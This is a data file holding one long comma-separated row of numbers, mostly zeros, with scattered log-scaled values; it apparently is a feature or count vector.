0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 5.442417710521793, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 1.7412592803704001, 0.0, 0, 0.0, 0.0, 0.0, 2.6390573296152584, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.713572066704308, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.1972245773362196, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.58351893845611, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 2.70805020110221, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.4825185607408002, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 9.129638369467537, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 4.1588830833596715, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, 3.295836866004329, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 4.04305126783455, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 3.0841946160253872, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 6.5667131767661875, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0, 0, 0, 4.31748811353631, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 6.578517662373903, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 3.5263605246161616, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 8.221747728346623, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0, 0.0, 0.0, 3.367295829986474, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.574710978503383, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 4.1588830833596715, 1.3862943611198906, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 3.7612001156935624, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.605170185988092, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.302585092994046, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.9459101490553132, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.1354942159291497, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.8501476017100584, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.4965075614664802, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.70805020110221, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 4.394449154672439, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 5.952096120109145, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 8.384291749700655, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 5.2237778411112, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.7612001156935624, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 5.575949103146317, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 5.723585101952381, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.290459441148391, 0, 0.0, 0, 0.0, 0, 0.0, 2.0794415416798357, 0, 3.800574088041945, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 3.0910424533583156, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.800574088041945, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 3.649511027115099, 2.995732273553991, 3.367295829986474, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.58351893845611, 0.0, 0, 0.6931471805599453, 0.0, 0.0, 1.6094379124341003, 2.8903717578961645, 0, 0.0, 0, 0.0, 4.160336650881089, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.800574088041945, 3.8005740880419454, 0, 0.0, 0.0, 3.2188758248682006, 0.0, 3.044522437723423, 4.605170185988092, 1.7412592803704001, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.178053830347946, 0, 0, 0, 0.0, 0.0, 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0, 2.0794415416798357, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 5.1298987149230735, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.784189633918261, 0, 1.3862943611198906, 0, 0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0, 0.0, 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 17.402456000857075, 